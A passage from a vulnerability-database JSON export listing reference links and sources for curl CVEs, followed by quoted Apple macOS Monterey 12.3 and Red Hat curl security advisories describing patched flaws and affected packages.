"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23507"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23493"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23504"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32915"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213604."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23502"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23518"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213603."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23517"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23513"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2152652"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2024:0428"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0428.json"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2179073"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2120718"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2179092"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252030"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2196793"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.8_release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:2963"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41674"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-43750"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41218"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3239"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26341"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3239"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-25815"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42722"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1679"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3707"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-1582"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1462"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-22490"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3028"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-20141"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-32314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-47929"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-39188"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-32313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3623"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-1999"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26341"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3627"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-20141"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-28856"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-23454"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25265"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3524"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-39189"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3028"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3567"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0394"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0461"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33655"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-25652"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33655"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:3326"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3564"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-1195"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-23946"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42703"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25265"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-29007"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1462"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1679"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:2478"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-1667"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-2283"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-0361"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24736"
},
{
"trust": 0.1,
"url": "https://volsync.readthedocs.io/en/stable/."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:4576"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-38408"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-2283"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync-rep"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-3089"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-24329"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-1667"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-26604"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2023-001"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-24329"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-27535"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38408"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-3089"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-26604"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-36227"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428403"
},
{
"db": "VULMON",
"id": "CVE-2022-35252"
},
{
"db": "PACKETSTORM",
"id": "168239"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170698"
},
{
"db": "PACKETSTORM",
"id": "176746"
},
{
"db": "PACKETSTORM",
"id": "172378"
},
{
"db": "PACKETSTORM",
"id": "172587"
},
{
"db": "PACKETSTORM",
"id": "172195"
},
{
"db": "PACKETSTORM",
"id": "174080"
},
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
},
{
"db": "NVD",
"id": "CVE-2022-35252"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-428403",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-35252",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168239",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170697",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170698",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "176746",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "172378",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "172587",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "172195",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "174080",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202208-4523",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-35252",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-09-23T00:00:00",
"db": "VULHUB",
"id": "VHN-428403",
"ident": null
},
{
"date": "2022-09-02T15:21:41",
"db": "PACKETSTORM",
"id": "168239",
"ident": null
},
{
"date": "2022-12-19T13:48:31",
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"date": "2023-01-24T16:41:07",
"db": "PACKETSTORM",
"id": "170697",
"ident": null
},
{
"date": "2023-01-24T16:41:28",
"db": "PACKETSTORM",
"id": "170698",
"ident": null
},
{
"date": "2024-01-26T15:24:15",
"db": "PACKETSTORM",
"id": "176746",
"ident": null
},
{
"date": "2023-05-16T17:09:54",
"db": "PACKETSTORM",
"id": "172378",
"ident": null
},
{
"date": "2023-05-26T14:34:05",
"db": "PACKETSTORM",
"id": "172587",
"ident": null
},
{
"date": "2023-05-09T15:14:58",
"db": "PACKETSTORM",
"id": "172195",
"ident": null
},
{
"date": "2023-08-09T15:56:32",
"db": "PACKETSTORM",
"id": "174080",
"ident": null
},
{
"date": "2022-08-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202208-4523",
"ident": null
},
{
"date": "2022-09-23T14:15:12.323000",
"db": "NVD",
"id": "CVE-2022-35252",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-03-01T00:00:00",
"db": "VULHUB",
"id": "VHN-428403",
"ident": null
},
{
"date": "2023-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202208-4523",
"ident": null
},
{
"date": "2025-05-05T17:18:16.463000",
"db": "NVD",
"id": "CVE-2022-35252",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "curl Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
}
],
"trust": 0.6
}
}
VAR-202109-1790
Vulnerability from variot - Updated: 2026-03-09 22:30A user can tell curl >= 7.20.0 and <= 7.78.0 to require a successful upgrade to TLS when speaking to an IMAP, POP3 or FTP server (--ssl-reqd on the command line orCURLOPT_USE_SSL set to CURLUSESSL_CONTROL or CURLUSESSL_ALL withlibcurl). This requirement could be bypassed if the server would return a properly crafted but perfectly legitimate response.This flaw would then make curl silently continue its operations withoutTLS contrary to the instructions and expectations, exposing possibly sensitive data in clear text over the network. A security issue was found in curl prior to 7.79.0. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2022-03-14-4 macOS Monterey 12.3
macOS Monterey 12.3 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213183.
Accelerate Framework Available for: macOS Monterey Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2022-22633: an anonymous researcher
AMD Available for: macOS Monterey Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2022-22669: an anonymous researcher
AppKit Available for: macOS Monterey Impact: A malicious application may be able to gain root privileges Description: A logic issue was addressed with improved validation. CVE-2022-22665: Lockheed Martin Red Team
AppleGraphicsControl Available for: macOS Monterey Impact: An application may be able to gain elevated privileges Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2022-22631: an anonymous researcher
AppleScript Available for: macOS Monterey Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory Description: An out-of-bounds read was addressed with improved input validation. CVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro
AppleScript Available for: macOS Monterey Impact: An application may be able to read restricted memory Description: This issue was addressed with improved checks. CVE-2022-22648: an anonymous researcher
AppleScript Available for: macOS Monterey Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro CVE-2022-22627: Qi Sun and Robert Ai of Trend Micro
AppleScript Available for: macOS Monterey Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2022-22597: Qi Sun and Robert Ai of Trend Micro
BOM Available for: macOS Monterey Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks Description: This issue was addressed with improved checks. CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)
curl Available for: macOS Monterey Impact: Multiple issues in curl Description: Multiple issues were addressed by updating to curl version 7.79.1. CVE-2021-22946 CVE-2021-22947 CVE-2021-22945 CVE-2022-22623
FaceTime Available for: macOS Monterey Impact: A user may send audio and video in a FaceTime call without knowing that they have done so Description: This issue was addressed with improved checks. CVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida
ImageIO Available for: macOS Monterey Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2022-22611: Xingyu Jin of Google
ImageIO Available for: macOS Monterey Impact: Processing a maliciously crafted image may lead to heap corruption Description: A memory consumption issue was addressed with improved memory handling. CVE-2022-22612: Xingyu Jin of Google
Intel Graphics Driver Available for: macOS Monterey Impact: An application may be able to execute arbitrary code with kernel privileges Description: A type confusion issue was addressed with improved state handling. CVE-2022-22661: an anonymous researcher, Peterpan0927 of Alibaba Security Pandora Lab
IOGPUFamily Available for: macOS Monterey Impact: An application may be able to gain elevated privileges Description: A use after free issue was addressed with improved memory management. CVE-2022-22641: Mohamed Ghannam (@_simo36)
Kernel Available for: macOS Monterey Impact: An application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2022-22613: Alex, an anonymous researcher
Kernel Available for: macOS Monterey Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2022-22614: an anonymous researcher CVE-2022-22615: an anonymous researcher
Kernel Available for: macOS Monterey Impact: A malicious application may be able to elevate privileges Description: A logic issue was addressed with improved state management. CVE-2022-22632: Keegan Saunders
Kernel Available for: macOS Monterey Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A null pointer dereference was addressed with improved validation. CVE-2022-22638: derrek (@derrekr6)
Kernel Available for: macOS Monterey Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved validation. CVE-2022-22640: sqrtpwn
libarchive Available for: macOS Monterey Impact: Multiple issues in libarchive Description: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation. CVE-2021-36976
Login Window Available for: macOS Monterey Impact: A person with access to a Mac may be able to bypass Login Window Description: This issue was addressed with improved checks. CVE-2022-22647: an anonymous researcher
LoginWindow Available for: macOS Monterey Impact: A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen Description: An authentication issue was addressed with improved state management. CVE-2022-22656
GarageBand MIDI Available for: macOS Monterey Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution Description: A memory initialization issue was addressed with improved memory handling. CVE-2022-22657: Brandon Perry of Atredis Partners
GarageBand MIDI Available for: macOS Monterey Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2022-22664: Brandon Perry of Atredis Partners
NSSpellChecker Available for: macOS Monterey Impact: A malicious application may be able to access information about a user's contacts Description: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management. CVE-2022-22644: an anonymous researcher
PackageKit Available for: macOS Monterey Impact: An application may be able to gain elevated privileges Description: A logic issue was addressed with improved state management. CVE-2022-22617: Mickey Jin (@patch1t)
Preferences Available for: macOS Monterey Impact: A malicious application may be able to read other applications' settings Description: The issue was addressed with additional permissions checks. CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)
QuickTime Player Available for: macOS Monterey Impact: A plug-in may be able to inherit the application's permissions and access user data Description: This issue was addressed with improved checks. CVE-2022-22650: Wojciech Reguła (@_r3ggi) of SecuRing
Safari Downloads Available for: macOS Monterey Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks Description: This issue was addressed with improved checks. CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)
Sandbox Available for: macOS Monterey Impact: A malicious application may be able to bypass certain Privacy preferences Description: The issue was addressed with improved permissions logic. CVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited, Khiem Tran
Siri Available for: macOS Monterey Impact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen Description: A permissions issue was addressed with improved validation. CVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg/)
SMB Available for: macOS Monterey Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2022-22651: Felix Poulin-Belanger
SoftwareUpdate Available for: macOS Monterey Impact: An application may be able to gain elevated privileges Description: A logic issue was addressed with improved state management. CVE-2022-22639: Mickey Jin (@patch1t)
System Preferences Available for: macOS Monterey Impact: An app may be able to spoof system notifications and UI Description: This issue was addressed with a new entitlement. CVE-2022-22660: Guilherme Rambo of Best Buddy Apps (rambo.codes)
UIKit Available for: macOS Monterey Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions Description: This issue was addressed with improved checks. CVE-2022-22621: Joey Hewitt
Vim Available for: macOS Monterey Impact: Multiple issues in Vim Description: Multiple issues were addressed by updating Vim. CVE-2021-4136 CVE-2021-4166 CVE-2021-4173 CVE-2021-4187 CVE-2021-4192 CVE-2021-4193 CVE-2021-46059 CVE-2022-0128 CVE-2022-0156 CVE-2022-0158
VoiceOver Available for: macOS Monterey Impact: A user may be able to view restricted content from the lock screen Description: A lock screen issue was addressed with improved state management. CVE-2021-30918: an anonymous researcher
WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A cookie management issue was addressed with improved state management. WebKit Bugzilla: 232748 CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix
WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may lead to code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 232812 CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team
WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. WebKit Bugzilla: 233172 CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab WebKit Bugzilla: 234147 CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab
WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. WebKit Bugzilla: 234966 CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative
WebKit Available for: macOS Monterey Impact: A malicious website may cause unexpected cross-origin behavior Description: A logic issue was addressed with improved state management. WebKit Bugzilla: 235294 CVE-2022-22637: Tom McKee of Google
Wi-Fi Available for: macOS Monterey Impact: A malicious application may be able to leak sensitive user information Description: A logic issue was addressed with improved restrictions. CVE-2022-22668: MrPhil17
xar Available for: macOS Monterey Impact: A local user may be able to write arbitrary files Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. CVE-2022-22582: Richard Warren of NCC Group
Additional recognition
AirDrop We would like to acknowledge Omar Espino (omespino.com), Ron Masas of BreakPoint.sh for their assistance.
Bluetooth We would like to acknowledge an anonymous researcher, chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab for their assistance.
Face Gallery We would like to acknowledge Tian Zhang (@KhaosT) for their assistance.
Intel Graphics Driver We would like to acknowledge Jack Dates of RET2 Systems, Inc., Yinyi Wu (@3ndy1) for their assistance.
Local Authentication We would like to acknowledge an anonymous researcher for their assistance.
Notes We would like to acknowledge Nathaniel Ekoniak of Ennate Technologies for their assistance.
Password Manager We would like to acknowledge Maximilian Golla (@m33x) of Max Planck Institute for Security and Privacy (MPI-SP) for their assistance.
Siri We would like to acknowledge an anonymous researcher for their assistance.
syslog We would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for their assistance.
TCC We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.
UIKit We would like to acknowledge Tim Shadel of Day Logger, Inc. for their assistance.
WebKit We would like to acknowledge Abdullah Md Shaleh for their assistance.
WebKit Storage We would like to acknowledge Martin Bajanik of FingerprintJS for their assistance.
macOS Monterey 12.3 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmIv0O4ACgkQeC9qKD1p rhjGGRAAjqIyEzN+LAk+2uzHIMQNEwav9fqo/ZNoYAOzNgActK56PIC/PBM3SzHd LrGFKbBq/EMU4EqXT6ycB7/uZfaAZVCBDNo1qOoYNHXnKtGL2Z/96mV14qbSmRvC jfg1pC0G1jPTxJKvHhuQSZHDGj+BI458fwuTY48kjCnzlWf9dKr2kdjUjE38X9RM 0upKVKqY+oWdbn5jPwgZ408NOqzHrHDW1iIYd4v9UrKN3pfMGDzVZTr/offL6VFL osOVWv1IZvXrhPsrtd2KfG0hTHz71vShVZ7jGAsGEdC/mT79zwFbYuzBFy791xFa rizr/ZWGfWBSYy8O90d1l13lDlE739YPc/dt1mjcvP9FTnzMwBagy+6//zAVe0v/ KZOjmvtK5sRvrQH54E8qTYitdMpY2aZhfT6D8tcl+98TjxTDNXXj/gypdCXNWqyB L1PtFhTjQ0WnzUNB7sosM0zAjfZ1iPAZq0XHDQ6p6gEdVavNOHo/ekgibVm5f1pi kwBHkKyq55QbzipDWwXl6Owk/iaHPxgENYb78BpeUQSFei+IYDUsyLkPh3L95PHZ JSyKOtbBArlYOWcxlYHn+hDK8iotA1c/SHDefYOoNkp1uP853Ge09eWq+zMzUwEo GXXJYMi1Q8gmJ9wK/A3d/FKY4FBZxpByUUgjYhiMKTU5cSeihaI= =RiA+ -----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: curl security update Advisory ID: RHSA-2022:0635-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:0635 Issue date: 2022-02-22 CVE Names: CVE-2021-22946 CVE-2021-22947 =====================================================================
- Summary:
An update for curl is now available for Red Hat Enterprise Linux 8.2 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64
- Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
Security Fix(es):
-
curl: Requirement to use TLS not properly enforced for IMAP, POP3, and FTP protocols (CVE-2021-22946)
-
curl: Server responses received before STARTTLS processed after TLS handshake (CVE-2021-22947)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Package List:
Red Hat Enterprise Linux BaseOS EUS (v. 8.2):
Source: curl-7.61.1-12.el8_2.4.src.rpm
aarch64: curl-7.61.1-12.el8_2.4.aarch64.rpm curl-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm curl-debugsource-7.61.1-12.el8_2.4.aarch64.rpm curl-minimal-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm libcurl-7.61.1-12.el8_2.4.aarch64.rpm libcurl-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm libcurl-devel-7.61.1-12.el8_2.4.aarch64.rpm libcurl-minimal-7.61.1-12.el8_2.4.aarch64.rpm libcurl-minimal-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm
ppc64le: curl-7.61.1-12.el8_2.4.ppc64le.rpm curl-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm curl-debugsource-7.61.1-12.el8_2.4.ppc64le.rpm curl-minimal-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm libcurl-7.61.1-12.el8_2.4.ppc64le.rpm libcurl-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm libcurl-devel-7.61.1-12.el8_2.4.ppc64le.rpm libcurl-minimal-7.61.1-12.el8_2.4.ppc64le.rpm libcurl-minimal-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm
s390x: curl-7.61.1-12.el8_2.4.s390x.rpm curl-debuginfo-7.61.1-12.el8_2.4.s390x.rpm curl-debugsource-7.61.1-12.el8_2.4.s390x.rpm curl-minimal-debuginfo-7.61.1-12.el8_2.4.s390x.rpm libcurl-7.61.1-12.el8_2.4.s390x.rpm libcurl-debuginfo-7.61.1-12.el8_2.4.s390x.rpm libcurl-devel-7.61.1-12.el8_2.4.s390x.rpm libcurl-minimal-7.61.1-12.el8_2.4.s390x.rpm libcurl-minimal-debuginfo-7.61.1-12.el8_2.4.s390x.rpm
